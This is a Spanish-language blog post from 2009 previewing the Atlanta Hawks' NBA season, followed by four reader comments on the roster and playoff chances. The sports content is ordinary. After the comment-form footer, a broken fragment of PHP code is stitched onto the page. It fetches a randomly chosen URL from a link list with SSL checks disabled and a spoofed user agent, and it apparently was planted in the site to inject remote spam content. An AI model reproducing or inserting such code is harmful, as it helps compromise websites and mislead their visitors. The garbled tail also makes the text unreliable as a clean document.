Atlanta Hawks: Se escapan las presas

24 de October de 2009 por TheDeerHunter

Ha llovido desde aquella memorable eliminatoria en la que estuvieron a punto de reventar la banca contra los Celtics campeonísimos de Garnett y compañía. Qué gran futuro les aguardaba, se decía. Un grupo de insolentes jóvenes, que sin estar exentos de talento poseían un físico descomunal  y hambre desatada. Algún retoque y el límite sería el infinito o incluso más allá.

De cuántos prometedores proyectos habremos concluido algo similar y qué poquitos han sido capaces de alcanzar la gloria a la que tan audazmente se les destinaba. En esta competición es complicado mantener proyectos a largo plazo. Lo que un día es un equipo interesante y barato al siguiente es un polvorín de renovaciones enquistadas para después degenerar en un pozo de contratos mastodónticos para estrellitas acomodadas.

Y no es que necesariamente tenga que ser este el caso de los Hawks. No podemos decirlo cuando el año pasado consolidaron su plaza de playoff en el Este, mostrando una solidez de 47 victorias. Pero también vimos que se fue Childress, que tuvieron problemas para renovar a Josh Smith (que tampoco llegó a ofrecer lo que prometía), y que ahora su máxima estrella Joe Johnson anuncia que el verano que viene saldrá al mercado. Adicionalmente han perdido a Flip Murray, pieza clave durante la anterior campaña. Son malos presagios de lo que les espera. No cabe duda.

El año pasado en el Este, con Boston, Cleveland y Orlando había 3 equipos a priori más potentes que los Hawks. Este curso la diferencia, lejos de disminuir, ha aumentado. ¿Y la teórica ventaja con respecto a equipos como Washington, Toronto u otros equipos pertenecientes a la clase media de la liga? ¿Ha aumentado? Para no caer en el estancamiento, este proyecto debería, como mínimo, aspirar a tocarle la cara a alguno de los fortísimos candidatos de su conferencia. El punto de mira debería estar en Boston, Cleveland y Orlando pero no es así.

Para poder pensar seriamente que este equipo podría pasar de 2ª ronda deberían confirmarse varias de las siguientes premisas:

– Que Joe Johnson mantenga o supere el nivel all-star que ha mostrado durante esta etapa y que además, mantenga su nivel de implicación colectiva en un proyecto que posiblemente no será el suyo el año que viene.

– Que Josh Smith y Al Horford, además de mantenerse imprescindiblemente sanos, demuestren una progresión significativa con respecto al curso pasado, cuando decepcionaron en este sentido. Ellos dos solos, deberán plantar batalla contra parejitas de la talla de Howard&Bass, Sheed&Garnett y/o Shaq&Ilgauskas.

– Que Jamal Crawford suponga un salto de calidad decisivo, aún cuando posiblemente llega para ser suplente de Joe Johnson (como no puede ser de otra manera, por otro lado) y para compensar la marcha de Flip Murray que tan bien lo hizo en ese papel el año pasado.

– Que Mike Bibby no se vea afectado excesivamente por un año más de declive. Y que para eso no tenga que jugar todos los minutos del mundo. No atrae mucho la idea de Crawford como base y tampoco se puede esperar que Jeff Teague (pick 19 de primera ronda) parta la pana desde el principio.

– Que Marvin Williams y Maurice Evans defiendan la posición de alero, como mínimo, igual que el año pasado.

– Que encontremos rendimiento inesperado en los Zaza Pachulia, Joe Smith, Jason Collins, Othello Hunter o Randolph Morris.

– Que enganchen un trade similar al de Gasol a los Lakers hace dos años.

No somos demasiado optimistas en que logren subir un peldaño con respecto a su pasada buena campaña, pero seguirá siendo un equipo rocoso, competitivo y espectacular. Para ellos no debería de ser suficiente.

Quinteto inicial: Bibby, Joe Johnson, Marvin Williams, Josh Smith y Al Horford.
6º hombre: Jamal Crawford.

Pronóstico: 2ª Ronda.

Comenta

4 comentarios a esta entrada

  1. Óscar dice:
    #1

    Yo sí creo que han mejorado el nivel de la plantilla, pero también que siguen estando por debajo de CLE, BOS u ORL. Se disputarían en principio la 4ª plaza del Este con PHI o WAS… pero esto es sólo teoría. Los Hawks son un equipo que se puede decir que es tan seguro que estarán en Playoffs como que es difícil que lleguen muy lejos. Esa 2ª ronda del pronóstico parece su tope, pero veremos.
    Se han deshecho de esa batería de bases/escoltas interesantes pero que aportaron poco o nada en 08/09: Speedy Claxton (GSW), Thomas Gardner (descartado por POR o CHA y esperando otra oportunidad), Acie Law (GSW), o Mario West (anteayer leí que lo habían cortado). La baja más sensible en el perímetro es la de Ronald Murray (CHA), 6º hombre el año pasado, con buenos números.
    A cambio, llega su fichaje más importante, Jamal Crawford, que tendrá el papel de “Flip” pero aportando otra dimensión. Por dentro, Joe Smith sí será muy útil para dar descanso a Josh Smith y Al Horford, a diferencia de Othello Hunter o Solomon Jones (IND), en los que confiaba poco Mike Woodson. Era una necesidad encontrar otro hombre sólido para la rotación interior.Jason Collins jugará si se lesionan Zaza o Horford.
    Lo más importante es que siguen teniendo una rotación batante corta, pero a priori más potente, que era el objetivo. El 5 inicial parece claro que es el que dice Deer con Bibby-J.Johnson-Williams-“Smooth”-Horford. Uno de los quintetos titulares más potentes físicamente de la LIga. La 2ª unidad sería Teague (otro base rookie interesante más), Crawford, Evans, Joe Smith y Pachulia. La verdad es que no suenan nada mal estos 10… a pesar de llamarse Johnson, Smith o Williams… Qué pena que al final no vuelva Childress, porque sería un jugador importante más para aportar muchas cosas. Poderoso caballero…

      Citar

  2. Txusma dice:
    #2

    Ojito con Jeff Teague que ha hecho una buena temporada a la chita callando. Me recuerda al mismo Jamaal Crawford por lo q tiene sus minutos bastante limitados pero en los 15 min q disputara lo puede hacer muy bien. Buena elección, a mi modo de ver.

      Citar

  3. Txusma dice:
    #3

    Hoy, 0 de 15 para Teague… Mejor estar calladito 😀

      Citar

  4. NBA LAKERS BLOG dice:
    #4

    2007-08: 1ra Ronda.
    2008-09: 2da Ronda.
    2009-10: ???

    Este equipo tiene lo que se necesita SIMPLEMENTE PARA HACER UNA BUENA TEMPORADA… a menos que demuestren la mayoría de los cambios que nombraste, muy dificil que pasen de 2da ronda… yo también los veo hasta ahí… pero si se ponen las pilas y mejoran sus errores, podría ser… el Este está complicado como para que los Hawks pasen, pero después de ver su esfuerzo en el 2008 ante los Celtics, no se los puede no tener en cuenta…

    Me quedo con esta frase tuya: “En esta competición es complicado mantener proyectos a largo plazo. Lo que un día es un equipo interesante y barato al siguiente es un polvorín de renovaciones enquistadas para después degenerar en un pozo de contratos mastodónticos para estrellitas acomodadas.” Tal cual.

    Felicitaciones por el informe, esta muy bueno 😉

    Un abrazo grande!

    Te esperamos en nuestro blog de los Lakers 😉

    GO L.A.!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>